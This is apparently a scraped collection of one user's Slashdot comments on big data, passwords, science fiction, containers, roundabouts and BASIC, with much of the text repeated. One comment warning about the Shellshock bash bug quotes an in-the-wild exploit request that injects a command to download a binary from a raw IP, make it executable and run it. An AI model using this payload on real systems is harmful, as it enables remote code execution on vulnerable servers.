The new glorious world of big data and data analytics has one small problem. Just because you have a ton of data doesn't mean that there is any useful information in it. Really, what are companies going to be able to glean from such a database? That some peoples heart rate goes up when they drive? Which means what?
Insurance companies are the original big data users. Actuarial science is all based on the premise that it is possible to predict the likely outcome for an individual through the statistical analysis of the larger group. They have been doing this quite successfully/profitably since the 1700's. There is a definite point of diminishing return between increased revenue by identifying higher risk individuals and the costs associated with implementing those programs. If it costs $1 million to implement you would need to identify 10,000 people and charge them an extra $100 just to break even. If they can find a competitor whose rate is less than that $100 increase and leave then you start losing money, and not just the $100 but the original premium as well.
A lot of people are under the misconception that all they need to do is gather data and they will then be able to sell it. But the data has to be useful and I just don't see it in this case.
Single factor authentication (ie password) is a people problem. If access to a site is granted by matching an identifier with one other piece of information, then it is the risk created by the compromise of those credentials that should govern how "strong" those credentials need to be.
Financial information? Strong. Personal Health information? Strong. Email? Depends on how interesting you are. Hardware store loyalty points? Meh.
The more important point from the article is this: "In fact, research from Microsoft/University of California at Berkeley/University of British Columbia (paper titled Does My Password Go Up to Eleven? The Impact of Password Meters on Password Selection) found that indeed, password gauges do encourage users to concoct stronger passwords."
Warn/shame people that their passwords suck and they are likely to do better.
(And interestingly enough, mathematically a site that insists on an 8 character password with at least one each of upper/lower case letters, numbers and special characters produces less secure passwords than a site that insists on 8 characters that can be any of those.)
If you are unfamiliar with the work of Clifford Simak I strongly suggest that you give him a try. What I have always loved is that there is so much that is just unknown going on in his stories. No great hero's, no great battles, just a lot of "what the hell is going on here?"
His last book "Highway of Eternity" is great and "Ring around the Sun" has always been a favorite as well. Most of his stuff is a short quick read abd us easily found in your favorite used book store (you do have one I hope).
At a minimum read the novel synopsis over at Wikipedia to get a glimpse of a very interesting author.
A great resource for situations like this is Turnkey Linux (http://www.turnkeylinux.org). They host a wide variety of fully built server images that make it easy to try out a number of systems to see what best fits your need. You can download and fire up well known CMS like Drupal or plone and see if they fit the need or not. Then if there is something they like they can load the iso on a bare metal box and go.
Really people? Your lives are so fascinating that you need to keep the details away from the digital paparazzi? Mine sure isn't.
Here is my take on what is going on here. First, the government doesn't care. Have you heard about the huge number of people arrested for having pictures on Facebook showing drug use? No? Well that is because it's not a threat to the greater good and not worth the time and effort to prosecute. Not even a cursory email saying to clean up your act or we will send you a more strongly worded email. Many of us may have dissident thoughts but we don't do dissident acts and are mostly harmless. So that leaves the Big Business boogie man with a financial motive. In the beginning there was the trifecta of terror, the credit rating agencies. They, with their magical patented Fair Issac scoring formula, have claimed for years that those numbers offer a glimpse into a persons soul. And they basically market it as such even when the intended use is based more on correlation than causation. As evidence I present the recent use of credit scores by insurance companies. My credit score has never been affected by my driving history, so why should my car insurance rates be based on my credit score? In my case I was given the option of allowing it or not. Allowing it could have saved me as much as 3%!, or cost me more, in any case the amount did not benefit me enough to make it worth my while. Same with the followup offer to install their OBD digital spy.
There are a bunch of people who think they can make a fortune collecting other peoples data. Reality is that most of that data is mundane garbage that has very little value to it. Much like the millions and millions of credit card numbers that have been compromised. Collecting the information is easy, monetizing it is hard.
I can't shake the feeling that I've seen this movie before, I think it was called "statically linked executables" where all the code needed to run the application resided in one place. Then as the executables got more complex they got much larger, consumed more resources, and large parts of each executable was redundant with each other. Hence static executables were superceded by "dynamically linked executables" which pulled out the redundancies into general purpose libraries that existed in only one place which led to dll version hell. So now we have containers which allows an application to be bundled up with just the code it needs to execute.
And yes, containers have more capabilities than simply isolating the code. However I would argue that code isolation is the primary use of containers.
I have a prediction, that by the end of 2015 we will see one of the container vendors offer a version that allows for "code sharing" between a master image and the individual containers in order to cut down on redundancy. Full Circle++.
Luke: Is the dark side stronger? Yoda: No, no, no. Quicker, easier, more seductive.
In so many subject areas you have the option of the quick and easy way or the more thorough slog through the fundamentals. Unfortunately, when you are young, the long term advantages of mastering the fundamentals is lost when compared to the short term gratification of getting an assignment done.
There have been many discussions here on Slashdot regarding the issues caused by people who do not understand the fundamentals of their jobs. Coders who cannot code efficiently because they do not understand what makes code inefficient or efficient or how to test for potential improvements. Personally I am aghast at the number of web developers I have run into who are clueless when it comes to networking. Since they have libraries and frameworks for that they don't feel the need to personally understand it. Don't even get me started on the horrible, horrible SQL queries I have seen. There is only so much optimization that can be done on the backend by the optimizing routines written by people who do know the fundamentals.
In the end, too many students seem to not understand the purpose of an "Education" and have confused it with its simpler cousin, "Job training".
1) ignorant bit torrent user who doesn't know how to configure their software to play nice in public 2) ignorant free wifi supplier who doesn't know how to configure their router for QOS 3) ignorant noob who relies on there being free wifi in order to do his job
I was in Carmel Indiana, a northern Indianapolis suburb, last week. Since the 1990's they have been replacing all of the main intersections with roundabouts. They have over 60 of them now.
While roundabouts have been proven to be safer for average drivers, how easy are they for autonomous vehicles to navigate vs your standard intersection? Is a roundabout an asset to the adoption of autonomous vehicles, a hinderance or a wash?
There is evidence that this is being exploited in the wild. Nginx and Apache servers using mod_cgi are two potentially vulnerable services.
The risk is that it is possible to modify environment variables which then could allow the execution of arbitrary code with the permissions of the parent process.
Over at the Internet Storm Center http://isc.sans.org/ they have been updating their advisory and and a have a simple one-liner to test if a system is vulnerable.
Hey Zuck! There is a whole army of non-US Ivy league MBA's who will be more than happy to produce the same BS as Joe Green for a fraction of the cost. Don't you want to work with the "Best"? Doesn't Joe Green want you to?
If one of our sites was down for as long as Adobe's was, heads would roll.
What took so long to restore? Crappy process for restoring server images or recovering a database?
Or, as others have speculated, was there a security breach and they couldn't bring it back up until all the evidence was gathered and the vulnerability was closed.
Oh wait, this is Adobe we are talking about. Their code doesn't have vulnerabilities.
Surprised at the number of hateful comments regarding BASIC. Even when it was created it was aimed at novices not experts, hence the name: Beginners All-purpose Symbolic Instruction Code. The true value was that the simple syntax made learning programming concepts much simpler. I used to teach a beginning programming class in the 80's that used BASIC. I always felt that I was able to instill a better understanding of what was going on with the simple Line # VERB parameter syntax of the early language. Breaking things down only four Verb types ( Definition, Assignment, I/O, Control) , the operators, and the two type of variables/constants (string/numeric). That's all there is folks. Would I want to try and write a compiler in it, no, but that is not what the language was written for.
Dinosaur trivia points: why do loops commonly use the variable i. (Hint: int does not stand for index.)
I hate studies like this. Do people pick common passwords, of course they do. Does everyone pick an easy to guess password, of course not. Can it be blindly determined, for any given user, if their password is "simple" or "complex"? No.
The article puts the blame on the end user, when the truth is the problem is with the websites storing the passwords in plain text or as un-salted hashes and not locking out brute force attacks. What the researchers are really arguing is that
1) your account may be compromised if hackers break into the website and steal all the passwords.
2) your password might be easier to guess if it is related to you, hackers are targeting you personally (not likely), and the website doesn't lock the account out.
Don't blame the user, blame the developers and administrators for being lazy and/or inept and failing to protect people from themselves.
Slashdot Mirror
"Something maybe rough around the edges but usable and exciting enough to use as daily desktop?"
Yup, that's pretty much the definition of Enlightenment
I love the Terminology terminal emulator and wish it was easier to install on non-Enlightenment distros.
Using Perl pretty much covers all nine and then some.
Except, perhaps, for #5 Yo-yo code. That is actually a built-in feature.
Ditto.
BTW, does anybody know what the opposite of TL;DR is?
The new glorious world of big data and data analytics has one small problem. Just because you have a ton of data doesn't mean that there is any useful information in it. Really, what are companies going to be able to glean from such a database? That some peoples heart rate goes up when they drive? Which means what?
Insurance companies are the original big data users. Actuarial science is all based on the premise that it is possible to predict the likely outcome for an individual through the statistical analysis of the larger group. They have been doing this quite successfully/profitably since the 1700's. There is a definite point of diminishing return between increased revenue by identifying higher risk individuals and the costs associated with implementing those programs. If it costs $1 million to implement you would need to identify 10,000 people and charge them an extra $100 just to break even. If they can find a competitor whose rate is less than that $100 increase and leave then you start losing money, and not just the $100 but the original premium as well.
A lot of people are under the misconception that all they need to do is gather data and they will then be able to sell it. But the data has to be useful and I just don't see it in this case.
Single factor authentication (ie password) is a people problem. If access to a site is granted by matching an identifier with one other piece of information, then it is the risk created by the compromise of those credentials that should govern how "strong" those credentials need to be.
Financial information? Strong. Personal Health information? Strong. Email? Depends on how interesting you are. Hardware store loyalty points? Meh.
The more important point from the article is this:
"In fact, research from Microsoft/University of California at Berkeley/University of British Columbia (paper titled Does My Password Go Up to Eleven? The Impact of Password Meters on Password Selection) found that indeed, password gauges do encourage users to concoct stronger passwords."
Warn/shame people that their passwords suck and they are likely to do better.
(And interestingly enough, mathematically a site that insists on an 8 character password with at least one each of upper/lower case letters, numbers and special characters produces less secure passwords than a site that insists on 8 characters that can be any of those.)
Maybe something like Tracks
or any of the other pre-packaged issue trackers from turnkeylinux.org
If you are unfamiliar with the work of Clifford Simak I strongly suggest that you give him a try. What I have always loved is that there is so much that is just unknown going on in his stories. No great hero's, no great battles, just a lot of "what the hell is going on here?"
His last book "Highway of Eternity" is great and "Ring around the Sun" has always been a favorite as well. Most of his stuff is a short quick read abd us easily found in your favorite used book store (you do have one I hope).
At a minimum read the novel synopsis over at Wikipedia to get a glimpse of a very interesting author.
And least we forget, Gene and Majel Roddenberry have passed as well.
A great resource for situations like this is Turnkey Linux (http://www.turnkeylinux.org). They host a wide variety of fully built server images that make it easy to try out a number of systems to see what best fits your need. You can download and fire up well known CMS like Drupal or plone and see if they fit the need or not. Then if there is something they like they can load the iso on a bare metal box and go.
Pythagoras imposed his quasi-religious philosophies... about never urinating towards the sun...
That was a translation error. What he actually said is you don't piss against the wind.
Where are my mod points when I need them!
Really people? Your lives are so fascinating that you need to keep the details away from the digital paparazzi? Mine sure isn't.
Here is my take on what is going on here. First, the government doesn't care. Have you heard about the huge number of people arrested for having pictures on Facebook showing drug use? No? Well that is because it's not a threat to the greater good and not worth the time and effort to prosecute. Not even a cursory email saying to clean up your act or we will send you a more strongly worded email. Many of us may have dissident thoughts but we don't do dissident acts and are mostly harmless. So that leaves the Big Business boogie man with a financial motive. In the beginning there was the trifecta of terror, the credit rating agencies. They, with their magical patented Fair Issac scoring formula, have claimed for years that those numbers offer a glimpse into a persons soul. And they basically market it as such even when the intended use is based more on correlation than causation. As evidence I present the recent use of credit scores by insurance companies. My credit score has never been affected by my driving history, so why should my car insurance rates be based on my credit score? In my case I was given the option of allowing it or not. Allowing it could have saved me as much as 3%!, or cost me more, in any case the amount did not benefit me enough to make it worth my while. Same with the followup offer to install their OBD digital spy.
There are a bunch of people who think they can make a fortune collecting other peoples data. Reality is that most of that data is mundane garbage that has very little value to it. Much like the millions and millions of credit card numbers that have been compromised. Collecting the information is easy, monetizing it is hard.
I can't shake the feeling that I've seen this movie before, I think it was called "statically linked executables" where all the code needed to run the application resided in one place. Then as the executables got more complex they got much larger, consumed more resources, and large parts of each executable was redundant with each other. Hence static executables were superceded by "dynamically linked executables" which pulled out the redundancies into general purpose libraries that existed in only one place which led to dll version hell. So now we have containers which allows an application to be bundled up with just the code it needs to execute.
And yes, containers have more capabilities than simply isolating the code. However I would argue that code isolation is the primary use of containers.
I have a prediction, that by the end of 2015 we will see one of the container vendors offer a version that allows for "code sharing" between a master image and the individual containers in order to cut down on redundancy. Full Circle++.
Luke: Is the dark side stronger?
Yoda: No, no, no. Quicker, easier, more seductive.
In so many subject areas you have the option of the quick and easy way or the more thorough slog through the fundamentals. Unfortunately, when you are young, the long term advantages of mastering the fundamentals is lost when compared to the short term gratification of getting an assignment done.
There have been many discussions here on Slashdot regarding the issues caused by people who do not understand the fundamentals of their jobs. Coders who cannot code efficiently because they do not understand what makes code inefficient or efficient or how to test for potential improvements. Personally I am aghast at the number of web developers I have run into who are clueless when it comes to networking. Since they have libraries and frameworks for that they don't feel the need to personally understand it. Don't even get me started on the horrible, horrible SQL queries I have seen. There is only so much optimization that can be done on the backend by the optimizing routines written by people who do know the fundamentals.
In the end, too many students seem to not understand the purpose of an "Education" and have confused it with its simpler cousin, "Job training".
1) ignorant bit torrent user who doesn't know how to configure their software to play nice in public
2) ignorant free wifi supplier who doesn't know how to configure their router for QOS
3) ignorant noob who relies on there being free wifi in order to do his job
There is a reason I've used this sig for years.
The steel construction of the Model M is a thing of beauty. And the weight keeps the cat from knocking it off my desk.
I was in Carmel Indiana, a northern Indianapolis suburb, last week. Since the 1990's they have been replacing all of the main intersections with roundabouts. They have over 60 of them now.
While roundabouts have been proven to be safer for average drivers, how easy are they for autonomous vehicles to navigate vs your standard intersection? Is a roundabout an asset to the adoption of autonomous vehicles, a hinderance or a wash?
There is evidence that this is being exploited in the wild.
Nginx and Apache servers using mod_cgi are two potentially vulnerable services.
The risk is that it is possible to modify environment variables which then could allow the execution of arbitrary code with the permissions of the parent process.
An example attack:
GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
Over at the Internet Storm Center http://isc.sans.org/ they have been updating their advisory and and a have a simple one-liner to test if a system is vulnerable.
It's getting harder and harder to find Gopher servers.
sdf.org to the rescue!
gopher://phlogosphere.org
Hey Zuck! There is a whole army of non-US Ivy league MBA's who will be more than happy to produce the same BS as Joe Green for a fraction of the cost. Don't you want to work with the "Best"? Doesn't Joe Green want you to?
If one of our sites was down for as long as Adobe's was, heads would roll.
What took so long to restore? Crappy process for restoring server images or recovering a database?
Or, as others have speculated, was there a security breach and they couldn't bring it back up until all the evidence was gathered and the vulnerability was closed.
Oh wait, this is Adobe we are talking about. Their code doesn't have vulnerabilities.
LISP - Lots of InSipid Parenthesis
Surprised at the number of hateful comments regarding BASIC. Even when it was created it was aimed at novices not experts, hence the name: Beginners All-purpose Symbolic Instruction Code. The true value was that the simple syntax made learning programming concepts much simpler. I used to teach a beginning programming class in the 80's that used BASIC. I always felt that I was able to instill a better understanding of what was going on with the simple Line # VERB parameter syntax of the early language. Breaking things down only four Verb types ( Definition, Assignment, I/O, Control) , the operators, and the two type of variables/constants (string/numeric). That's all there is folks. Would I want to try and write a compiler in it, no, but that is not what the language was written for.
Dinosaur trivia points: why do loops commonly use the variable i. (Hint: int does not stand for index.)
Puzzles, puzzles and more puzzles! Number puzzles, word puzzles, shape puzzles! Tangram! Origami!
Things that make you think! Things that give you a sense of accomplishment when completed! Things that make you feel as smart as you are!
Because...
somehow I don't think that a group of people looking for government subsidies for their healthcare represent the best targets for identity fraud.
I hate studies like this. Do people pick common passwords, of course they do. Does everyone pick an easy to guess password, of course not. Can it be blindly determined, for any given user, if their password is "simple" or "complex"? No.
The article puts the blame on the end user, when the truth is the problem is with the websites storing the passwords in plain text or as un-salted hashes and not locking out brute force attacks. What the researchers are really arguing is that
1) your account may be compromised if hackers break into the website and steal all the passwords.
2) your password might be easier to guess if it is related to you, hackers are targeting you personally (not likely), and the website doesn't lock the account out.
Don't blame the user, blame the developers and administrators for being lazy and/or inept and failing to protect people from themselves.